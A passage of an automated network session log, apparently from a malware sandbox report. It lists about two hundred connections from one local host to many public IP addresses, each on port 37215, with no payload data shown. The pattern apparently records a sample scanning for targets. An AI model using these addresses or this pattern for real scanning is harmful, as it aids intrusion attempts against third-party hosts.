                                                          4485192.168.2.1556474218.171.219.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4486192.168.2.153766641.129.27.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4487192.168.2.1552488197.75.30.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4488192.168.2.1533804160.191.120.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4489192.168.2.153339452.81.135.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4490192.168.2.155172041.95.73.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4491192.168.2.153287841.158.29.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4492192.168.2.1536604197.5.168.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4493192.168.2.1551442197.91.151.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4494192.168.2.1540720157.183.192.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4495192.168.2.1550864169.135.244.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4496192.168.2.153440441.12.69.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4497192.168.2.153800241.104.45.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4498192.168.2.154950841.25.210.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4499192.168.2.1545396197.161.199.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4500192.168.2.153622889.4.19.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4501192.168.2.1534266157.124.135.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4502192.168.2.154875041.114.173.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4503192.168.2.1558110197.67.168.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4504192.168.2.1545852197.141.76.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4505192.168.2.154660641.209.32.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4506192.168.2.1556456157.148.78.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4507192.168.2.155484097.209.22.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4508192.168.2.1556202157.157.204.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4509192.168.2.1556546197.19.62.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4510192.168.2.1548836197.46.169.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4511192.168.2.1548804190.136.164.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4512192.168.2.1558966157.185.14.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4513192.168.2.1557706157.229.194.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4514192.168.2.1539812197.202.92.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4515192.168.2.1548240197.191.137.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4516192.168.2.155578441.188.177.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4517192.168.2.155820054.241.167.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4518192.168.2.1559590213.103.72.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4519192.168.2.155057241.51.237.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4520192.168.2.153916441.247.6.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4521192.168.2.1534068197.133.177.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4522192.168.2.154188214.216.252.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4523192.168.2.1553952160.6.108.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4524192.168.2.1545814197.53.143.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4525192.168.2.155256241.224.206.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4526192.168.2.1533830197.61.219.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4527192.168.2.154113637.29.37.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4528192.168.2.155975241.78.113.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4529192.168.2.1558980157.173.158.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4530192.168.2.1559232157.231.125.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4531192.168.2.1541872197.226.40.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4532192.168.2.1544588157.149.30.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4533192.168.2.1546314115.89.162.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4534192.168.2.1542630157.80.30.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4535192.168.2.154191441.219.91.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4536192.168.2.1545712157.145.69.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4537192.168.2.1539130197.195.72.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4538192.168.2.1535690197.234.241.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4539192.168.2.1548636116.229.232.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4540192.168.2.1554542157.69.162.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4541192.168.2.154301441.107.127.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4542192.168.2.155209638.180.210.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4543192.168.2.1533322197.231.177.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4544192.168.2.1550320197.158.213.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4545192.168.2.1537890157.175.64.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4546192.168.2.1554206197.127.216.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4547192.168.2.1546354157.248.187.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4548192.168.2.1536670197.199.110.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4549192.168.2.1556852197.155.168.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4550192.168.2.1559756168.205.220.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4551192.168.2.155118441.61.49.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4552192.168.2.154894843.121.95.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4553192.168.2.1540692157.138.15.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4554192.168.2.154988841.164.14.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4555192.168.2.1557248157.39.18.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4556192.168.2.1536958197.53.51.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4557192.168.2.1540234157.251.156.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4558192.168.2.154890841.51.144.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4559192.168.2.1555248157.112.190.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4560192.168.2.153652441.243.102.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4561192.168.2.1534592138.17.63.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4562192.168.2.1544666157.80.77.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4563192.168.2.1547774197.75.131.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4564192.168.2.1552762118.132.133.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4565192.168.2.1540426197.175.187.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4566192.168.2.1542984197.186.122.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4567192.168.2.1536622117.20.18.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4568192.168.2.1540766197.213.161.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4569192.168.2.1558986197.226.2.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4570192.168.2.1543288197.188.202.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4571192.168.2.1548132197.107.21.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4572192.168.2.1533810197.84.66.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4573192.168.2.154742841.207.140.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4574192.168.2.1549916157.109.71.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4575192.168.2.1560448157.139.182.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4576192.168.2.1536750167.190.190.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4577192.168.2.154867043.182.226.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4578192.168.2.1547924197.180.16.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4579192.168.2.1539968157.126.50.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4580192.168.2.1548744216.200.119.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4581192.168.2.153375041.93.68.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4582192.168.2.1543046197.57.24.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4583192.168.2.1541242157.186.241.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4584192.168.2.154713841.81.61.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4585192.168.2.1545342157.18.238.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4586192.168.2.1553424197.169.34.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4587192.168.2.1554066109.154.35.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4588192.168.2.154088241.80.149.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4589192.168.2.1551660157.201.245.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4590192.168.2.1548970223.94.44.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4591192.168.2.1546048157.181.172.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4592192.168.2.1551200157.63.224.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4593192.168.2.1543446157.62.199.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4594192.168.2.1541166197.25.0.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4595192.168.2.154753241.112.83.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4596192.168.2.1560952197.193.210.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4597192.168.2.155310641.69.169.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4598192.168.2.1540644165.29.141.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4599192.168.2.1554256157.164.182.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4600192.168.2.1544152157.213.21.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4601192.168.2.1560996157.170.1.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4602192.168.2.1554574157.106.83.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4603192.168.2.1536730197.37.171.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4604192.168.2.1537606157.18.31.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4605192.168.2.1549782130.2.209.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4606192.168.2.1560588197.56.55.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4607192.168.2.154521214.141.54.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4608192.168.2.154292614.72.245.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4609192.168.2.1541194197.186.119.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4610192.168.2.1557436197.215.56.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4611192.168.2.1534922182.174.46.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4612192.168.2.1555520157.152.205.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4613192.168.2.1548240178.136.235.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4614192.168.2.1540758197.253.24.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4615192.168.2.154947441.119.185.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4616192.168.2.154989841.69.39.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4617192.168.2.1538250121.80.1.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4618192.168.2.153865695.191.70.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4619192.168.2.1533218213.22.242.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4620192.168.2.1548480157.148.128.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4621192.168.2.155245041.230.121.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4622192.168.2.1545706157.92.14.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4623192.168.2.1533088190.151.79.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4624192.168.2.153601641.179.216.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4625192.168.2.155781841.150.41.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4626192.168.2.153812441.189.41.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4627192.168.2.1560650151.216.255.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4628192.168.2.1540912157.28.169.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4629192.168.2.1534962197.63.19.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4630192.168.2.155092441.106.239.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4631192.168.2.1551618219.135.2.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4632192.168.2.1560752199.160.4.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4633192.168.2.1546054157.246.248.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4634192.168.2.1551378157.94.34.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4635192.168.2.1536792177.27.189.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4636192.168.2.1559084198.27.94.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4637192.168.2.1535002157.194.9.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4638192.168.2.1545364141.192.168.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4639192.168.2.1555970197.145.199.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4640192.168.2.1534160157.111.232.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4641192.168.2.154149241.212.42.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4642192.168.2.154343441.135.158.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4643192.168.2.155701841.249.4.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4644192.168.2.1552706197.108.8.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4645192.168.2.1560302117.214.173.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4646192.168.2.1546282197.43.204.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4647192.168.2.1553744157.189.50.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4648192.168.2.1539926157.107.69.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4649192.168.2.1547410157.186.185.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4650192.168.2.153498086.89.139.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4651192.168.2.154568241.167.200.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4652192.168.2.1552540197.196.29.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4653192.168.2.153341641.180.135.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4654192.168.2.1554392157.116.174.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4655192.168.2.154787641.66.64.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4656192.168.2.153444841.35.173.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4657192.168.2.154598449.198.194.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4658192.168.2.153277241.62.254.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4659192.168.2.154273085.136.175.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4660192.168.2.153562641.18.180.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4661192.168.2.154917041.205.16.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4662192.168.2.1542170197.179.140.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4663192.168.2.1536470197.65.135.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4664192.168.2.154893841.131.18.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4665192.168.2.1543060157.79.55.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4666192.168.2.1545910197.116.237.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4667192.168.2.155139641.248.114.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4668192.168.2.155064241.100.89.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4669192.168.2.1555750157.71.166.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4670192.168.2.1560758108.161.58.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4671192.168.2.1540804197.89.92.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4672192.168.2.1541004128.165.243.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4673192.168.2.1559174197.165.123.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4674192.168.2.154208841.51.19.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4675192.168.2.153587441.0.108.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4676192.168.2.1542324157.89.148.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4677192.168.2.1551138197.208.96.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4678192.168.2.1550328197.163.124.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4679192.168.2.1551026197.77.236.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4680192.168.2.1554030197.40.71.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4681192.168.2.1559680136.138.121.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4682192.168.2.1558002157.189.43.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4683192.168.2.1537538197.136.73.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4684192.168.2.154126841.95.135.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4685192.168.2.1545052157.91.186.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4686192.168.2.1536226173.188.31.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4687192.168.2.1541236157.226.123.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4688192.168.2.1554650157.147.100.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4689192.168.2.155006441.117.166.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4690192.168.2.1560212157.179.113.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4691192.168.2.1553570124.247.38.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4692192.168.2.1543620197.74.119.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4693192.168.2.1542156197.39.224.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
